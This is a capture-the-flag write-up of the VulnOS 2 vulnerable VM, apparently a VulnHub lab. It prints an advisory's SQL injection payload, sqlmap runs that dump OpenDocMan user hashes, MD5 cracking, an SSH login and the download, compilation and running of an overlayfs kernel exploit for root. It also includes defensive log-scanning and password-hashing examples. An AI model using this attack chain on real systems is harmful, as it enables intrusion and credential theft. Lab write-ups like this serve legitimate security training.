VulnOS 2 Writeup

This time, we are doing the VulnOS 2 vulnerable VM.

To begin with, I nmap the target for active services:

[email protected]:~# nmap -A -T4 -sV -v -p- 192.168.56.104

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-21 11:17 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:17
Completed NSE at 11:17, 0.00s elapsed
Initiating NSE at 11:17
Completed NSE at 11:17, 0.00s elapsed
Initiating ARP Ping Scan at 11:17
Scanning 192.168.56.104 [1 port]
Completed ARP Ping Scan at 11:17, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:17
Completed Parallel DNS resolution of 1 host. at 11:17, 0.03s elapsed
Initiating SYN Stealth Scan at 11:17
Scanning 192.168.56.104 [65535 ports]
Discovered open port 80/tcp on 192.168.56.104
Discovered open port 22/tcp on 192.168.56.104
Discovered open port 6667/tcp on 192.168.56.104
Completed SYN Stealth Scan at 11:18, 20.41s elapsed (65535 total ports)
Initiating Service scan at 11:18
Scanning 3 services on 192.168.56.104
Completed Service scan at 11:18, 11.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.104
NSE: Script scanning 192.168.56.104.
Initiating NSE at 11:18
Completed NSE at 11:19, 69.54s elapsed
Initiating NSE at 11:19
Completed NSE at 11:19, 0.02s elapsed
Nmap scan report for 192.168.56.104
Host is up (0.00098s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_  256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Sat May 21 11:17:41 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 192.168.56.104

NSE: Script Post-scanning.
Initiating NSE at 11:19
Completed NSE at 11:19, 0.00s elapsed
Initiating NSE at 11:19
Completed NSE at 11:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.49 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65772 (2.648MB)

So we've got SSH, IRC and a webserver. Let's see what's on that webserver.

By navigating to http://192.168.56.104/, I am presented with a webpage telling me to navigate to /jabc, which is the company website in question. Let's head over there and see what I can find.


So it's a website about selling AI products for espionage etc etc. By taking a closer look at the page's source code, it can be seen that it's a Drupal website.


However, droopescan doesn't show anything interesting apart from some warnings, so I keep browsing the site for any clues on how to move forward.

Everything seems to be fine, until I land on the "documentation" page.


It's pretty much blank. Let's take a closer look at the source of the documentation page.


Indeed, there is some content that I cannot see with the naked eye. It says that the documentation platform is in /jabcd0cs/ so let's see what's in there.


I'm presented with an OpenDocMan page. After logging in, we can see some pieces of documentation posted by user "min web".


Also, we see at the bottom that the version of OpenDocMan used is 1.2.7. I look for vulnerabilities for it:

[email protected]:~# searchsploit opendocman 1.2.7
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                             |  Path
                                                                                                                           | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                                                                | ./php/webapps/32075.txt
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------


Let's see what this is about. In the text it's stated that there is an SQL injection vulnerability in ajax_udf.php and more specifically in parameter add_value.

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
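
Seen from the server side, the flaw is that add_value is expected to be a bare table name but is accepted with arbitrary SQL appended. The following is an added example, not code from the advisory or from OpenDocMan: it scans an Apache-style access log for ajax_udf.php requests whose add_value is anything other than a plain identifier. The log lines are constructed, and the function names and log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not captured from the target). The two flagged
# payloads are the ones quoted in the advisory and in sqlmap's output on this page.
SAMPLE_LOG = """\
192.168.56.4 - - [21/May/2016:11:40:01 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512
192.168.56.4 - - [21/May/2016:11:45:54 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 530
192.168.56.4 - - [21/May/2016:11:46:00 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20WHERE%209669%3D9669%20AND%209046%3D9046--%20WWea HTTP/1.1" 200 498
192.168.56.4 - - [21/May/2016:11:47:10 +0200] "GET /jabcd0cs/index.php HTTP/1.1" 200 2048
"""

# client, identd, user, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3}')
IDENT_RE = re.compile(r"[A-Za-z0-9_]{1,64}")


def is_plain_identifier(value):
    """True only for a bare table-name-like token (letters, digits, underscore)."""
    return IDENT_RE.fullmatch(value) is not None


def suspicious_requests(log_text):
    """Return (client_ip, decoded add_value) for ajax_udf.php requests whose
    add_value carries anything beyond a bare identifier."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/ajax_udf.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and %28 cannot hide the payload.
        for value in parse_qs(url.query, keep_blank_values=True).get("add_value", []):
            if not is_plain_identifier(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} add_value={value!r}")
```

The same identifier check, applied in the application before the value reaches the query, is the input validation the advisory says was missing.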

Let's fire up sqlmap and see what we can find.

[email protected]:~# sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --risk=3 --level=5 --threads=4
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:45:52

[11:45:52] [INFO] testing connection to the target URL
[11:45:53] [INFO] heuristics detected web page charset 'ISO-8859-2'
[11:45:53] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:45:53] [INFO] testing if the target URL is stable
[11:45:54] [INFO] target URL is stable
[11:45:54] [INFO] heuristics detected web page charset 'ascii'
[11:45:54] [WARNING] heuristic (basic) test shows that GET parameter 'add_value' might not be injectable
[11:45:54] [INFO] testing for SQL injection on GET parameter 'add_value'
[11:45:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:45:59] [WARNING] reflective value(s) found and filtering out
[11:46:00] [INFO] GET parameter 'add_value' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:46:00] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
[11:46:15] [INFO] GET parameter 'add_value' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
[11:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[11:46:15] [INFO] checking if the injection point on GET parameter 'add_value' is a false positive
GET parameter 'add_value' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:
---
Parameter: add_value (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=1&add_value=odm_user WHERE 9669=9669 AND 9046=9046-- WWea

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: q=1&add_value=odm_user WHERE 2883=2883 AND (SELECT * FROM (SELECT(SLEEP(5)))tuJF)-- duly
---
[11:46:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[11:46:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.104'

Some of the above output has been omitted because of its length; however, we can see that our target is indeed vulnerable. Let's get the databases.

[email protected]:~# sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --threads=4 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin

Again, some output has been omitted.

At this point, I'm spending some time enumerating the databases, looking for tables, users, privileges etc etc.

Trying to get a valid SSH login out of the user accounts I find, I come across the following credentials in "jabcd0cs", the database of OpenDocMan, inside table "odm_user":

[email protected]:~# sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --threads=2 -D jabcd0cs -T odm_user --dump
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
Database: jabcd0cs
Table: odm_user
[2 entries]
+----+--------------------+-------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| id | Email              | phone       | username | password                                 | last_name | first_name | department | pw_reset_code |
+----+--------------------+-------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| 1  | [email protected] | 5555551212  | webmin   | b78aae356709f8c31118ea613980954b         | min       | web        | 2          |        |
| 2  | [email protected]  | 555 5555555 | guest    | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
+----+--------------------+-------------+----------+------------------------------------------+-----------+------------+------------+---------------+

As we can see, sqlmap cracked the guest password automatically. Now let's see what can be done about user "webmin". The hash looks like an MD5, so first let's see if an online cracker can help with that. md5cracker.org is the one I'll use.

We navigate to the site, paste our hash and wait for it. After a while...


After a couple of seconds, there we have it. The password of user "webmin" is "webmin1980".
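
The lookup succeeds this quickly because an unsalted MD5 digest depends only on the password, so a precomputed table can answer it for any user. The following is an added example, not OpenDocMan's code: it flags stored values that have the shape of a bare MD5 digest and shows a salted, iterated replacement. The function names, storage format and iteration count are assumptions.

```python
import hashlib
import hmac
import os
import re

RAW_MD5_RE = re.compile(r"[0-9a-f]{32}")
ITERATIONS = 600_000  # assumed work factor; tune to your hardware

# The two odm_user rows from the dump above (username, stored password field).
DUMPED = [("webmin", "b78aae356709f8c31118ea613980954b"),
          ("guest", "084e0343a0486ff05530df6c705c8bb4")]


def unsalted_md5(password):
    """The scheme the dump suggests: digest depends on the password alone."""
    return hashlib.md5(password.encode()).hexdigest()


def weak_rows(rows):
    """Usernames whose stored value has the shape of a bare MD5 digest."""
    return [user for user, stored in rows if RAW_MD5_RE.fullmatch(stored.lower())]


def hash_password(password):
    """Salted PBKDF2-HMAC-SHA256, stored as 'iterations$salt_hex$hash_hex'."""
    salt = os.urandom(16)  # fresh per user, so equal passwords differ on disk
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    iterations, salt_hex, hash_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), hash_hex)


if __name__ == "__main__":
    print("bare MD5 rows:", weak_rows(DUMPED))
    # Same (constructed) password twice: identical under MD5, different when salted.
    print(unsalted_md5("Example#1") == unsalted_md5("Example#1"))
    print(hash_password("Example#1") == hash_password("Example#1"))
```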

First things first, let's try to connect through ssh.

[email protected]:~# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat May 21 11:33:04 CEST 2016

  System load:  0.0               Processes:           89
  Usage of /:   5.8% of 29.91GB   Users logged in:     0
  Memory usage: 17%               IP address for eth0: 192.168.56.104
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sat May 21 11:33:04 2016 from 192.168.56.4
$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:~$

Aaand I'm in! Plus, with that small beautiful Python one-liner I now have an interactive shell.

After a little bit of enumeration, we know that the system is Ubuntu 14.04 and the version of the kernel.

[email protected]:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
[email protected]:~$ cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
[email protected]:~$

So let's give a try to an overlayfs exploit that has worked before.

[email protected]:~$ wget https://www.exploit-db.com/download/37292
--2016-05-21 11:52:51--  https://www.exploit-db.com/download/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: ‘37292’

100%[======================================>] 5,123       --.-K/s   in 0s      

2016-05-21 11:52:51 (371 MB/s) - ‘37292’ saved [5123/5123]

[email protected]:~$ mv 37292 exploit.c
[email protected]:~$ gcc -o exploit exploit.c 
[email protected]:~$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
[email protected]:~$ ./exploit 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
# python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/home/webmin#

And that's it, I got root, and an interactive root shell for that matter. So now, let's go grab the flag.

[email protected]:/home/webmin# updatedb
[email protected]:/home/webmin# locate flag.txt
/root/flag.txt
[email protected]:/home/webmin# cat /root/flag.txt 
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

There we have it. Flag captured! Now, what do I think of A.I.? I think that Google is Skynet and at some point we will have a "matrix" or "terminator" situation on our hands.

Thanks a lot c4b3rw0lf for this vm, and once again, many thanks to Vulnhub for making such things possible. Cheers!
